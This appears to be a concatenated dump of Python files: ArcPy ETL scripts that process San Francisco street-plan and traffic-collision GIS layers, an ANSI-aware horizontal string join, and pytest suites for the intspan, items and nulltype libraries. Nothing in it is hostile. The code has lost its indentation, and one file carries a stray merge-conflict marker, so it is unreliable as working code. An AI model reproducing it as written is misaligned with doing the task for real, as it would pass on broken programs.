# Dissolve BSP (dissolve before join to make join faster)
bsp_local_3 = "BetterStreetsPlan_TIM"
arcpy.Dissolve_management(staging_gdb + bsp_local_2, staging_gdb + bsp_local_3, ["STREETNAME","BSP_Class","Special","finaltype"], "", "", "")
print "BSP dissolved"
print "BSP joining fields..."
file.write(str(time.ctime()) +": dissolved"+ "\n")
# Join fields from sidewalk table
arcpy.JoinField_management(staging_gdb + bsp_local_3, "finaltype", BSP_sidewalks, "finaltype", "side_min;side_rec")
print "BSP fields joined"
file.write(str(time.ctime()) +": joined"+ "\n")
# process Green Connections
# Dissolve Green Connections
gc_local_3 = "GreenConnectionsTIM_dissolve"
arcpy.Dissolve_management(staging_gdb + gc_local_2, staging_gdb + gc_local_3, ["STREETNAME","GC_RT_NME5","GC_RT_NUM5"], "", "", "")
print "GC dissolved"
file.write(str(time.ctime()) +": dissolved 2"+ "\n")
# function to create buffers
def arcpybuffer(buffer_name,original_name,buffer_dist,dissolve_opt,dissolve_fld):
print("\n")
print "Buffering " + buffer_name
# bufferlist.append(buffer_name)
staging_name = staging_gdb + original_name
filename_buffer = staging_gdb + buffer_name
arcpy.Buffer_analysis(staging_name, filename_buffer, buffer_dist, "", "", dissolve_opt, dissolve_fld)
# Buffer BSP
arcpybuffer("betterstreetsbuffer",bsp_local_3,"250 Feet","","")
file.write(str(time.ctime()) +": buffered 1"+ "\n")
# Buffer GC
arcpybuffer("greenconnectionsbuffer",gc_local_3,"250 Feet","","")
file.write(str(time.ctime()) +": buffered2"+ "\n")
print("FINISHED SUCCESSFULLY")
file.write(str(time.ctime()) +": FINISHED SUCCESSFULLY"+ "\n")
file.close()
################################################################################################
except Exception,e:
print str(e)
print "Ended badly"
file.write(str(time.ctime()) +": Ended badly")
file.write(str(e))
file.close()
print arcpy.GetMessages()
print arcpy.GetMessages(2)
print arcpy.GetMessages(1)
myEndTime = time.clock()
theTime = myEndTime - myStartTime
theEndTime = time.ctime()
theMinutes = theTime / 60
print arcpy.GetMessages(2)
print arcpy.GetMessages(1)
myEndTime = time.clock()
theTime = myEndTime - myStartTime
theEndTime = time.ctime()
theMinutes = theTime / 60
>>>>>>> 1f289a2542687ec384d7420d6d2e26d6ba66bc07:GreenConnectionsBSP_in_gdb.py
```
#### File: jonathanengelbert/ETLs/transbase_2v2.py
```python
import arcpy
from arcpy import env
import sys, string, os, time, datetime
# SET TO OVERWRITE
arcpy.env.overwriteOutput = True
# Logging script
myStartDate = str(datetime.date.today())
myStartTime = time.clock()
theStartTime = time.ctime()
print theStartTime
try:
myStartDate = str(datetime.date.today())
myStartTime = time.clock()
theStartTime = time.ctime()
# thisfile = os.path.realpath(__file__)
file = open("C:/ETLs/TIM/TIMUpdates/Logs/" + myStartDate + "Transbase2" + ".txt", "w")
file.write(theStartTime + "\n")
when =datetime.date.today()
theDate = when.strftime("%d")
theDay=when.strftime("%A")
print theDay
################################################################################################
#STEP ONE
# COPYING FROM SDE TO LOCAL STAGING FOLDER
# NOTE: NO NEED TO REPROJECT TRANSBASE LAYERS
# filepath for all copied files:
staging_gdb = "\\\\CP-GIS-SVR1\\arcgisserver\\DataAndMXDs\\TIMReady\\Transbase_2.gdb\\"
# pedestrian collisions
#HAS THIS CHANGED NAME?
tb_ped = "Database Connections\\Transbase.sde\\transbase_public.public.vw_geo_switrs_all_types_ped_col_cty"
pedcol_1 = "pedcol_1"
try:
pedcolloc="\\\\CP-GIS-SVR1\\arcgisserver\\DataAndMXDs\\TIMReady\\Transbase_2.gdb\\pedcol_1"
#arcpy.CopyFeatures_management(tb_ped, staging_gdb + pedcol_1, "", "0", "0", "0")
arcpy.CopyFeatures_management(tb_ped, pedcolloc, "", "0", "0", "0")
print "Pedestrian collisions from Transbase loaded"
print "Copied successfully to staging folder"
file.write(str(time.ctime()) +": copied files - ped"+ "\n")
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO COPY - ped"+ "\n")
print "FAILED TO COPY - ped"
# bike collisions
tb_bikecol = "Database Connections\\Transbase.sde\\transbase_public.public.vw_geo_switrs_all_types_cyc_col_cty"
bikecol_1 = "bikecol_1"
try:
arcpy.CopyFeatures_management(tb_bikecol, staging_gdb + bikecol_1, "", "0", "0", "0")
arcpy.MultipartToSinglepart_management(staging_gdb + bikecol_1, staging_gdb + "bikecol_1_singlepart")
print "Bicycle collisions from Transbase loaded"
print "Copied successfully to staging folder"
file.write(str(time.ctime()) +": copied files - bike"+ "\n")
except:
file.write(str(time.ctime()) +": FAILED TO COPY - bike"+ "\n")
print "FAILED TO COPY - bike"
bikecol_1 = "bikecol_1_singlepart"
# pedestrian collisions (all parties)
tb_ped_party = "Database Connections\\Transbase.sde\\transbase_public.public.vw_geo_intrsctn_switrs_all_types_ped_col_prties_all_cty"
tb_ped_party = "Database Connections\\Transbase.sde\\transbase_public.public.vw_geo_switrs_all_types_ped_col_prties_all_cty"
pedcol_party = "pedcol_party"
try:
arcpy.CopyFeatures_management(tb_ped_party, staging_gdb + pedcol_party, "", "0", "0", "0")
print "Pedestrian collisions (all parties) from Transbase loaded"
print "Copied successfully to staging folder"
file.write(str(time.ctime()) +": copied files - pedcol party"+ "\n")
except:
file.write(str(time.ctime()) +": FAILED TO COPY - pedcol party"+ "\n")
print "FAILED TO COPY - pedcol party"
# bike collisions (all parties)
#tb_bike_party = "Database Connections\\Transbase.sde\\transbase_public.public.vw_geo_intrsctn_switrs_all_types_cyc_col_prties_all_cty"
tb_bike_party = "Database Connections\\Transbase.sde\\transbase_public.public.vw_geo_switrs_all_types_cyc_col_prties_all_cty"
bikecol_party = "bikecol_party"
try:
arcpy.CopyFeatures_management(tb_bike_party, staging_gdb + bikecol_party, "", "0", "0", "0")
print "Bicycle collisions (all parties) from Transbase loaded"
print "Copied successfully to staging folder"
file.write(str(time.ctime()) +": copied files - bikecol party"+ "\n")
except:
file.write(str(time.ctime()) +": FAILED TO COPY - bikecol party"+ "\n")
print "FAILED TO COPY - bikecol party"
################################################################################################
#STEP TWO
# GEOPROCESSING: PED AND BIKE INJURY/FATALITY COUNT AT INTERSECTION
# Ped counts at intersection
pedcol_2 = "TB_pedcollisions_int"
try:
print "Calculating ped counts..."
arcpy.AddField_management(staging_gdb + pedcol_1, "pedinj", "SHORT", "", "", "", "", "NULLABLE", "NON_REQUIRED", "")
arcpy.AddField_management(staging_gdb + pedcol_1, "pedfatal", "SHORT", "", "", "", "", "NULLABLE", "NON_REQUIRED", "")
arcpy.CalculateField_management(staging_gdb + pedcol_1, "pedinj", "!count_ped_injured!", "PYTHON", "")
arcpy.CalculateField_management(staging_gdb + pedcol_1, "pedfatal", "!count_ped_injured!", "PYTHON", "")
print "Success"
file.write(str(time.ctime()) +": calculated ped counts"+ "\n")
print "Dissolving ped counts..."
arcpy.Dissolve_management(
staging_gdb + pedcol_1,
staging_gdb + pedcol_2,
"cnn_intrsctn_fkey",
"primary_rd FIRST;secondary_rd FIRST;intersection FIRST;pedinj SUM;pedfatal SUM", "MULTI_PART", "DISSOLVE_LINES"
)
print "Success"
except Exception as e:
print(e)
print "Success"
file.write(str(time.ctime()) +": dissolved"+ "\n")
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS ped counts"+ "\n")
# Bike counts at intersection
try:
print "Calculating bike counts..."
arcpy.AddField_management(staging_gdb + bikecol_1, "bikeinj", "SHORT", "", "", "", "", "NULLABLE", "NON_REQUIRED", "")
arcpy.AddField_management(staging_gdb + bikecol_1, "bikefatal", "SHORT", "", "", "", "", "NULLABLE", "NON_REQUIRED", "")
arcpy.CalculateField_management(staging_gdb + bikecol_1, "bikeinj", "!count_bicyclist_injured!", "PYTHON", "")
arcpy.CalculateField_management(staging_gdb + bikecol_1, "bikefatal", "!count_bicyclist_killed!", "PYTHON", "")
print "Success"
file.write(str(time.ctime()) +": calculated bike counts"+ "\n")
print "Dissolving bike counts..."
bikecol_2 = "TB_bikecollisions_int"
arcpy.Dissolve_management(
staging_gdb + bikecol_1,
staging_gdb + bikecol_2,
"cnn_intrsctn_fkey",
"primary_rd FIRST;secondary_rd FIRST;intersection FIRST;bikeinj SUM;bikefatal SUM", "MULTI_PART", "DISSOLVE_LINES"
)
print "Success"
file.write(str(time.ctime()) +": dissolved bikes"+ "\n")
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS bike counts"+ "\n")
################################################################################################
#STEP THREE
# GEOPROCESSING: PED AND BIKE FATALITIES
# PED
# Ped fatalities
try:
switrs_mvmt_csv = "C:\\ETLs\\TIM\\TIMUpdates\\Helper Files\\switrs_mvmt.csv"
switrs_mvmt_codes = "C:\\ETLs\\TIM\\TIMUpdates\\Helper Files\\switrs_mvmt.dbf"
arcpy.CopyRows_management (switrs_mvmt_csv, switrs_mvmt_codes)
print "SWITRS codes loaded"
except:
file.write(str(time.ctime()) +": FAILED TO PROCESS ped fatalities - SWITRS codes loading failed"+ "\n")
print "SWITRS codes not loaded"
try:
print "Filtering for ped fatalities..."
# Create shapefile: pedestrian level, fatalities only
ped_f = "pedcollisions_party_ped_fatal"
arcpy.FeatureClassToFeatureClass_conversion (staging_gdb + pedcol_party, staging_gdb, ped_f, """ "party_type" = 'Pedestrian' AND "party_number_killed" <> 0 """)
file.write(str(time.ctime()) +": copied FC - ped fatal"+ "\n")
print("Success")
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS ped fatalities - feature class to feature class conversion (ped level fatalities)"+ "\n")
print "error - feature class to feature class conversion (ped level fatalities)"
try:
# Create shapefile: auto level, with only columns for join (collision ID and turning movement of car)
ped_f_auto = "ped_f_auto"
arcpy.FeatureClassToFeatureClass_conversion (staging_gdb + pedcol_party, staging_gdb, ped_f_auto, """ "party_type" = 'Driver (including Hit and Run)' """)
print "Success"
file.write(str(time.ctime()) +": copied FC - ped f auto"+ "\n")
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS ped fatalities - feature class to feature class conversion (auto level dataset)"+ "\n")
print "error - feature class to feature class conversion (auto level)"
# Join auto movement to ped fatality table
try:
print "Processing ped fatalities..."
# rename first to avoid confusion
arcpy.AddField_management(staging_gdb + ped_f_auto, "auto_move", "TEXT", "", "", "100", "", "NULLABLE", "NON_REQUIRED", "")
arcpy.CalculateField_management(staging_gdb + ped_f_auto, "auto_move", "!move_pre_acc!", "PYTHON_9.3", "")
arcpy.DeleteField_management(staging_gdb + ped_f_auto, "move_pre_acc")
arcpy.JoinField_management(staging_gdb + ped_f, "cnn_intrsctn_fkey", staging_gdb + ped_f_auto, "cnn_intrsctn_fkey", ["auto_move"])
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS ped fatalities - field manipulations"+ "\n")
try:
print "Joining ped fatalities..."
file.write(str(time.ctime()) +": joined ped fatalities"+ "\n")
# Join codes to auto move
arcpy.JoinField_management(staging_gdb + ped_f, "auto_move", switrs_mvmt_codes, "Code", ["auto_desc"])
print "Success"
except:
file.write(str(time.ctime()) +": FAILED TO PROCESS ped fatalities - join table"+ "\n")
# BIKE
try:
print "Filtering for bike fatalities..."
# Create shapefile: bike level, fatalities only
bike_f = "bikecollisions_party_bike_fatal"
arcpy.FeatureClassToFeatureClass_conversion (staging_gdb + bikecol_party, staging_gdb, bike_f, """ "party_type" = 'Bicyclist' AND "number_killed" <> 0 """)
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS bike fatalities - feature class to feature class conversion (bicyclist level dataset)"+ "\n")
try:
# Create shapefile: auto level, with only columns for join (collision ID and turning movement of car)
bike_f_auto = "ped_f_auto"
arcpy.FeatureClassToFeatureClass_conversion (staging_gdb + bikecol_party, staging_gdb, bike_f_auto, """ "party_type" = 'Driver (including Hit and Run)' """)
print "Success"
except:
file.write(str(time.ctime()) +": FAILED TO PROCESS bike fatalities - feature class to feature class conversion (auto level dataset)"+ "\n")
# Join auto movement to bike fatality table
try:
print "Processing bike fatalities..."
# rename first to avoid confusion
arcpy.AddField_management(staging_gdb + bike_f_auto, "auto_move", "TEXT", "", "", "100", "", "NULLABLE", "NON_REQUIRED", "")
arcpy.CalculateField_management(staging_gdb + bike_f_auto, "auto_move", "!move_pre_acc!", "PYTHON_9.3", "")
arcpy.DeleteField_management(staging_gdb + bike_f_auto, "move_pre_acc")
arcpy.JoinField_management(staging_gdb + bike_f, "cnn_intrsctn_fkey", staging_gdb + bike_f_auto, "cnn_intrsctn_fkey", ["auto_move"])
except Exception as e:
print(e)
file.write(str(time.ctime()) +": FAILED TO PROCESS bike fatalities - field manipulations"+ "\n")
try:
print "Joining bike fatalities..."
# Join codes to auto move
arcpy.JoinField_management(staging_gdb + bike_f, "auto_move", switrs_mvmt_codes, "Code", ["auto_desc"])
print "Success"
file.write(str(time.ctime()) +": joined bike fatalities"+ "\n")
except:
file.write(str(time.ctime()) +": FAILED TO PROCESS bike fatalities - join table"+ "\n")
# function to create buffers
def arcpybuffer(buffer_name,original_name,buffer_dist,dissolve_opt,dissolve_fld):
print("\n")
print "Buffering " + buffer_name
#bufferlist.append(buffer_name)
staging_name = staging_gdb + original_name
filename_buffer = staging_gdb + buffer_name
arcpy.Buffer_analysis(staging_name, filename_buffer, buffer_dist, "", "", dissolve_opt, dissolve_fld)
print "finished buffer"
# buffer all
# 500 feet buffer, no dissolve
arcpybuffer("TB_pedcollisions_int_buffer",pedcol_2,"500 Feet","","")
arcpybuffer("TB_bikecollisions_int_buffer",bikecol_2,"500 Feet","","")
arcpybuffer("pedcollisions_party_ped_fatal_buffer",ped_f,"500 Feet","","")
arcpybuffer("bikecollisions_party_bike_fatal_buffer",bike_f,"500 Feet","","")
file.write(str(time.ctime()) +": ran buffers"+ "\n")
file.write(str(time.ctime()) +": FINISHED SUCCESSFULLY"+ "\n")
file.close()
print "FINISHED SUCCESSFULLY"
################################################################################################
except Exception,e:
print "Ended badly"
file.write(str(time.ctime()) +": Ended badly")
print str(e)
file.write(str(e))
file.close()
``` |
{
"source": "jonathaneunice/hjoin",
"score": 3
} |
#### File: hjoin/hjoin/core.py
```python
from ansiwrap import ansilen, ansi_terminate_lines
def string_shape(s):
"""
Return the height, width of a string, in lines/scharacters.
h,w order chosen to be compatible with rows, columns standard of
NumPy and and its shape method.
"""
lines = s.splitlines()
lengths = [ansilen(l) for l in lines]
return (len(lengths), max(lengths or [0]))
def ansi_ljust(s, width):
needs = width - ansilen(s)
if needs > 0:
return s + ' ' * needs
else:
return s
def hjoin(strings, sep=' '):
"""
Horizontal join. Concatenates strings horizontally. Like
join, but considers nth line of each string to be another column
and concatenates it appropriately.
"""
if not strings:
return ''
ncols = len(strings)
slines = [ansi_terminate_lines(s.splitlines()) for s in strings]
shapes = [string_shape(s) for s in strings]
heights, widths = zip(*shapes)
height = max(heights)
lines = []
for row_index in range(height):
row = []
for col_index in range(ncols):
col_lines = slines[col_index]
if row_index < heights[col_index]:
cell = col_lines[row_index]
else:
cell = ''
celljust = ansi_ljust(cell, widths[col_index])
row.append(celljust)
lines.append(sep.join(row))
return '\n'.join(lines)
``` |
{
"source": "jonathaneunice/intspan",
"score": 3
} |
#### File: intspan/test/test_intspan.py
```python
import pytest
from intspan import *
from intspan import ParseError
def test_basic():
s = intspan()
tests = ['', '1', '1-2', '1-3,9-10', '1-3,14,29,92-97']
for t in tests:
s = intspan(t)
assert str(s) == t
def test_alt_contstructors():
assert intspan(range(100)) == intspan('0-99')
assert intspan([1,3,5]) == intspan('1,3,5')
assert intspan([5,3,1]) == intspan('1,3,5')
assert intspan(intspan('1,3,5')) == intspan('1,3,5')
def test_parse_error():
with pytest.raises(ParseError):
s = intspan('7*99')
with pytest.raises(ParseError):
s = intspan('-4,5-4')
with pytest.raises(ParseError):
s = intspan('1-4,5-')
def test_spaces():
assert list(intspan(' ')) == []
assert list(intspan(' 1')) == [1]
assert list(intspan('1, 4, 4 , 9')) == [1, 4, 9]
assert list(intspan('1, 4, 4 , 9')) == [1, 4, 9]
assert list(intspan('1, 4, 4 , 9')) == [1, 4, 9]
assert list(intspan(' 1, \n4,\n 4 , 9')) == [1, 4, 9]
def test_negatives():
assert list(intspan('-2')) == [-2]
assert list(intspan('-2-1')) == [-2, -1, 0, 1]
assert list(intspan('-2--1')) == [-2, -1]
def test_contains():
s = intspan()
assert 1 not in s
assert 100 not in s
assert 0 not in s
t = intspan('1,10')
assert 1 in t
assert 10 in t
assert 0 not in t
assert 2 not in t
def test_equals():
s = intspan('1,3,5,7,9')
assert s == set([1, 3, 5, 7, 9])
def test_strict_super_or_subset():
s = intspan('1,3,5,7,9')
t = intspan('1,3,5')
u = intspan('0,1,3,5')
assert s > t
assert not s > u
assert t < s
assert t < u
assert u > t
assert not s < u
assert not s > u
def test_isdisjoint():
s = intspan('1,3,5,7,9')
t = intspan('33-44')
u = intspan('1,3,99,299')
assert s.isdisjoint(t)
assert not s.isdisjoint(u)
assert t.isdisjoint(u)
def test_copy():
t = intspan('1,10')
tt = t.copy()
assert type(tt) == type(t)
assert t == tt
assert t is not tt
def test_clear():
s = intspan('1,2,3,5,8,13,21')
s.clear()
assert s == intspan()
def test_len():
s = intspan('1,2,3,5,8,13,21')
assert len(s) == 7
s.pop()
assert len(s) == 6
s.clear()
assert len(s) == 0
def test_merge():
assert str(intspan('1-4,5')) == '1-5'
def test_out_of_order():
assert str(intspan('1,0,99,4,7,9,98')) == '0-1,4,7,9,98-99'
def test_discard():
s = intspan('1-3,14,29,92-97')
s.discard('2,13,92')
assert str(s) == '1,3,14,29,93-97'
def test_remove():
s = intspan('1-3,14,29,92-97')
s.remove('2,92')
assert str(s) == '1,3,14,29,93-97'
with pytest.raises(KeyError):
s.remove(1000)
def test_add():
s = intspan('1-2')
s.add('3,29')
assert str(s) == '1-3,29'
s.add('92,97,96,95,94')
assert str(s) == '1-3,29,92,94-97'
s.add(93)
assert str(s) == '1-3,29,92-97'
s.add('14')
assert str(s) == '1-3,14,29,92-97'
def test_iteration():
s = intspan('92,97,96,95,0,94')
assert [item for item in s] == [0, 92, 94, 95, 96, 97]
assert list(s) == [0, 92, 94, 95, 96, 97]
assert set(s) == set([0, 92, 94, 95, 96, 97])
def test_issubset():
s = intspan('92,97,96,95,0,94')
assert s.issubset('0-100')
assert s.issubset(range(98))
assert s.issubset(range(101))
assert s.issubset('0, 92-100')
assert s.issubset([0] + list(range(92, 101)))
assert s.issubset(intspan('92,97,96,95,0,94'))
assert s.issubset([0, 92, 94, 95, 96, 97])
assert not s.issubset('0-10')
assert not s.issubset(range(20))
assert not s.issubset(range(95))
def test_issuperset():
s = intspan('0-3,7')
assert s.issuperset('0-2')
assert s.issuperset([0, 1, 3])
assert not s.issuperset(range(6))
assert not s.issuperset('0-6')
assert s >= intspan('0-2')
assert s >= intspan([0, 1, 3])
assert not s >= range(6)
assert not s >= intspan('0-6')
def test_union():
s = intspan('0-3,7')
assert s.union('0-2') == s
assert list(s.union('0-2')) == [0, 1, 2, 3, 7]
assert list(s.union([99, 101])) == [0, 1, 2, 3, 7, 99, 101]
assert s.union([99, 101]) == intspan('0-3,7,99,101')
assert s | intspan('0-2') == s.union('0-2')
assert s | [99, 101] == s.union('99,101')
def test_intersection():
s = intspan('1-8')
t = intspan('2-5')
u = intspan('8,100')
assert s.intersection(t) == intspan('2-5')
assert t.intersection(u) == intspan()
assert s.intersection(u) == intspan('8')
assert s & t == s.intersection(t)
assert t & u == t.intersection(u)
assert s & u == s.intersection(u)
def test_difference():
s = intspan('1-8')
t = intspan('2-5')
assert s.difference(t) == intspan('1,6-8')
assert t.difference(s) == intspan()
assert s - t == s.difference(t)
assert t - s == t.difference(s)
def test_symmetric_difference():
s = intspan('1-8')
t = intspan('2-5')
assert s.symmetric_difference(t) == intspan('1,6-8')
assert t.symmetric_difference(s) == intspan('1,6-8')
assert t.symmetric_difference(t) == intspan()
assert s ^ t == s.symmetric_difference(t)
assert t ^ s == t.symmetric_difference(s)
assert t ^ t == t.symmetric_difference(t)
def test_augmented_assignments():
s = intspan('50-60')
s |= intspan('10-20')
assert s == intspan('10-20,50-60')
s &= intspan('0-55')
assert s == intspan('10-20,50-55')
s -= intspan('16-20')
assert s == intspan('10-15,50-55')
s ^= intspan('10,99')
assert s == intspan('11-15,50-55,99')
t = intspan('50-60')
t.update('10-20')
assert t == intspan('10-20,50-60')
t.intersection_update('0-55')
assert t == intspan('10-20,50-55')
t.difference_update('16-20')
assert t == intspan('10-15,50-55')
t.symmetric_difference_update('10,99')
assert t == intspan('11-15,50-55,99')
def test_pop():
s = intspan('100-110')
assert s.pop() == 100
assert s.pop() == 101
assert s.pop() == 102
assert s.pop() == 103
assert s.pop() == 104
assert s.pop() == 105
assert s == intspan('106-110')
s = intspan('1-2')
assert s.pop() == 1
assert s.pop() == 2
with pytest.raises(KeyError):
s.pop()
def test_ranges():
assert intspan().ranges() == []
assert intspan('2').ranges() == [(2, 2)]
assert intspan('1-3').ranges() == [(1, 3)]
assert intspan('1-3,5-6').ranges() == [(1, 3), (5, 6)]
def test_from_range():
assert intspan.from_range(1, 3) == intspan('1-3')
assert intspan.from_range(2, 44) == intspan('2-44')
def test_from_ranges():
assert intspan.from_ranges([(1, 3), (5, 6)]) == intspan('1-3,5-6')
assert intspan.from_ranges([(1, 3)]) == intspan('1-3')
assert intspan.from_ranges([(2, 2)]) == intspan('2')
assert intspan.from_ranges([]) == intspan()
def test_universe():
assert intspan().universe() == intspan()
assert intspan('').universe() == intspan()
assert intspan([]).universe() == intspan()
assert intspan('1').universe() == intspan('1')
assert intspan('1,3,5,7').universe() == intspan('1-7')
s = intspan('1,3,5-9')
assert s.universe() == intspan('1-9')
assert s.universe(high=10) == intspan('1-10')
assert s.universe(high=14) == intspan('1-14')
assert s.universe(low=0) == intspan('0-9')
assert s.universe(low=0, high=14) == intspan('0-14')
assert s.universe(-2, 5) == intspan('-2-5')
assert intspan('1-100').universe() == intspan('1-100')
def test_complement():
s = intspan('1,3,5-9')
assert s.complement() == intspan('2,4')
assert s.complement(high=10) == intspan('2,4,10')
assert s.complement(high=14) == intspan('2,4,10-14')
assert s.complement(low=0) == intspan('0,2,4')
assert s.complement(low=0, high=14) == intspan('0,2,4,10-14')
assert s.complement(-2, 5) == intspan('-2,-1,0,2,4')
items = intspan('1-3,5,7-9,10,21-24')
assert items.complement() == intspan('4,6,11-20')
assert items.complement(high=30) == intspan('4,6,11-20,25-30')
with pytest.raises(ValueError):
intspan().complement()
# cannot get the complement of an empty set
def test_repr_and_str():
s = intspan('10-20,50-55')
s.add(9)
s.discard('15-40')
assert str(s) == '9-14,50-55'
assert repr(s) == "intspan('" + str(s) + "')"
``` |
{
"source": "jonathaneunice/items",
"score": 3
} |
#### File: items/test/test.py
```python
from collections import OrderedDict, namedtuple
import json
import os
import sys
import pytest
from items import *
_PY2 = sys.version_info < (3, 0)
_PY36 = sys.version_info >= (3, 6)
def test_empty():
it = Item()
assert list(it.keys()) == []
assert list(it.values()) == []
assert list(it.items()) == []
assert isinstance(it, dict)
assert isinstance(it, OrderedDict)
def test_simple():
it = Item(a=1, c=22, b=99, r=4.4, d='this')
keys = 'a c b r d'.split()
values = [1, 22, 99, 4.4, 'this']
if _PY36:
assert list(it.keys()) == keys
else:
assert set(it.keys()) == set(keys)
if _PY36:
assert list(it.values()) == values
else:
assert set(it.values()) == set(values)
assert isinstance(it, dict)
assert isinstance(it, OrderedDict)
def test_from_dict():
d = {'this': 99, 'that': 'friends'}
it = Item(d)
assert it.this == d['this']
assert it['this'] == d['this']
assert it.that == d['that']
assert it['that'] == d['that']
def test_missing():
it = Item(a=1, b=2)
assert it.c is Empty
assert it['c'] is Empty
def test_repr():
it = Item(a=1, b=2, c='something')
if _PY36:
assert repr(it) == "Item(a=1, b=2, c='something')"
else:
r = repr(it)
assert r.startswith('Item(')
assert r.endswith(')')
assert 'a=1' in r
assert 'b=2' in r
assert "c='something'" in r
def test_Empty():
e = Empty
assert e.more.f.d is Empty
assert e[1].method().there[33][0].no.attributes[99].here is Empty
assert list(Empty) == []
for x in Empty:
assert False # should/must never execute
def test_from_tuples():
it = Item([('name', 'Susie'),
('age', 12),
('hobby', 'science'),
('friends', ['Dell', 'Bill'])])
assert it.name == 'Susie'
assert it.age == 12
assert it.hobby == 'science'
assert it.friends == ['Dell', 'Bill']
assert len(it) == 4
with pytest.raises(ValueError):
it2 = Item([('name', 'Susie'),
('age', 12, 33), # unbalanced
('hobby', 'science'),
('friends', ['Dell', 'Bill'])])
Item(it2)
def test_attr_assign():
it = Item()
it.a = 12
it.b = 44
assert it.a == 12
assert it.b == 44
assert it['a'] == 12
assert it['b'] == 44
assert list(it.keys()) == ['a', 'b']
assert list(it.values()) == [12, 44]
def test_attr_del():
it = Item(a=12, b=44)
del it.b
assert it.a == 12
assert it.b == Empty
assert len(it) == 1
del it.a
assert it.a == Empty
assert len(it) == 0
del it.a
assert len(it) == 0
def test_named_tuple():
NT = namedtuple('NT', 'a b c')
n = NT(1, 2, 3)
assert n.a == 1
assert n.b == 2
assert n.c == 3
ni = Item(n)
assert ni.a == 1
assert ni.b == 2
assert ni.c == 3
assert set(ni.keys()) == set(['a', 'b', 'c'])
# this verbose test statement due to Python 3.5 not having static dict
# item ordering
d = { 'first': 1, 'n': n}
di = Item(d)
print(di)
assert di.first == 1
assert di.n.a == 1
assert di.n.b == 2
assert di.n.c == 3
di.two = 'two'
di.n.a = 100
di.n.d = 'ddd'
assert di.first == 1
assert di.two == 'two'
assert di.n.a == 100
assert di.n.b == 2
assert di.n.c == 3
assert di.n.d == 'ddd'
assert set(di.keys()) == set(['first', 'n', 'two'])
assert set(di.n.keys()) == set('abcd')
def test_itemize():
things = [ {'a': 1}, {'a': 7} ]
for t in itemize(things):
assert isinstance(t, Item)
assert t.a == 1 or t.a == 7
def test_itemize_non_dict():
assert itemize_all([4, 3], 'a') == [Item(a=4), Item(a=3)]
assert itemize_all([(1, 2), (4, 5)], 'a b') == [Item(a=1, b=2), Item(a=4, b=5)]
# skipping some tail members doesn't cause problems
assert itemize_all([(1, 2, 3), (4, 5, 6), (7, 8, 9)], 'a b c') == \
[Item(a=1, b=2, c=3), Item(a=4, b=5, c=6), Item(a=7, b=8, c=9)]
assert itemize_all([(1, 2, 3), (4, 5), (7, 8, 9)], 'a b c') == \
[Item(a=1, b=2, c=3), Item(a=4, b=5), Item(a=7, b=8, c=9)]
assert itemize_all([(1, 2, 3), (4, ), (7, 8, 9)], 'a b c') == \
[Item(a=1, b=2, c=3), Item(a=4), Item(a=7, b=8, c=9)]
assert itemize_all([(1, 2, 3), 4, (7, 8, 9)], 'a b c') == \
[Item(a=1, b=2, c=3), Item(a=4), Item(a=7, b=8, c=9)]
def test_itemize_all():
things = [ {'a': 1}, {'a': 7} ]
t_all = itemize_all(things)
assert isinstance(t_all, list)
assert len(t_all) == 2
assert t_all[0].a == 1
assert t_all[1].a == 7
assert t_all[1].other is Empty
def test_composite_1():
"""
Read a JSON file, and ensure it has the same structure as Items as it
does in a native, non-attribute-accessible structure using OrderedDict
"""
datadir, _ = os.path.split(__file__)
datapath = os.path.join(datadir, 'testdata', 'data1.json')
with open(datapath) as f:
rawjson = f.read()
data_i = json.loads(rawjson, object_pairs_hook=Item)
data_o = json.loads(rawjson, object_pairs_hook=OrderedDict)
for x, y in zip(data_i, data_o):
assert list(x.keys()) == list(y.keys())
assert list(x.values()) == list(y.values())
``` |
{
"source": "jonathaneunice/nulltype",
"score": 3
} |
#### File: nulltype/test/test_nonnulltype.py
```python
from nulltype import NonNullType
Extant = NonNullType("Extant")
Something = NonNullType("Something")
Flubber = NonNullType("Flubber")
nonnulls = [Extant, Something, Flubber]
def test_doc_example():
Full = NonNullType('Full')
assert bool(Full) is True
assert len(Full) == 1
assert list(Full) == [Full]
assert Full.some_attribute is Full
assert Full[22] is Full
assert Full("hey", 12) is Full
def test_bool():
for n in nonnulls:
assert bool(n)
def test_if():
for n in nonnulls:
if not n:
assert False
def test_getitem():
assert Something[33] is Something
assert Something["yo"] is Something
def test_setitem():
Flubber[33] = 1.134
assert Flubber[33] is Flubber
def test_getattr():
for nonnull in nonnulls:
assert nonnull.attribute is nonnull
assert nonnull.other is nonnull
assert nonnull.attribute.other.another is nonnull
assert nonnull.other.attribute.another is nonnull
assert nonnull.another.attribute.other is nonnull
def test_getattr_getitem():
assert Something[12].something[33].lazy is Something
SwedishChef = NonNullType('SwedishChef')
alt = SwedishChef
assert alt.swedish.chef.bork.bork.bork is SwedishChef
# tip of the hat to the Usenet of yore
def test_setattr():
for nonnull in nonnulls:
attrs = getattr(nonnull, '__dict__')
nonnull.one = 44
nonnull.this.that.the_other = 444
assert getattr(nonnull, '__dict__') == attrs
# ie, after attribute changes, assert that none have chagned
def test_iteration():
for nonnull in nonnulls:
assert len(nonnull) == 1
assert list(nonnull) == [nonnull]
for n in nonnull:
assert n is nonnull
def test_call():
for nonnull in nonnulls:
assert nonnull() is nonnull
# now gild the lily
assert nonnull()["something"] is nonnull
assert nonnull().something is nonnull
def test_repr():
names = ["Extant", "Something", "Flubber"]
for nonnull, name in zip(nonnulls, names):
assert repr(nonnull) == name
def test_set_name():
Bozo = NonNullType("Bozo")
assert str(Bozo) == "Bozo"
Bozo.__name == "Bozo the Clown"
assert str(Bozo) == "Bozo"
# No name changes!
``` |
{
"source": "jonathaneunice/options",
"score": 3
} |
#### File: options/options/callattr.py
```python
import sys
_PY2 = sys.version_info[0] == 2
if _PY2:
class _ALFKJSLJD(object):
def m(self): pass
meth_type = type(_ALFKJSLJD.m)
def callable_func(target):
if _PY2 and isinstance(target, meth_type):
return target.__func__
return target
def callable_setattr(target, name, value):
setattr(callable_func(target), name, value)
def callable_getattr(target, name):
try:
return getattr(callable_func(target), name)
except AttributeError:
return None
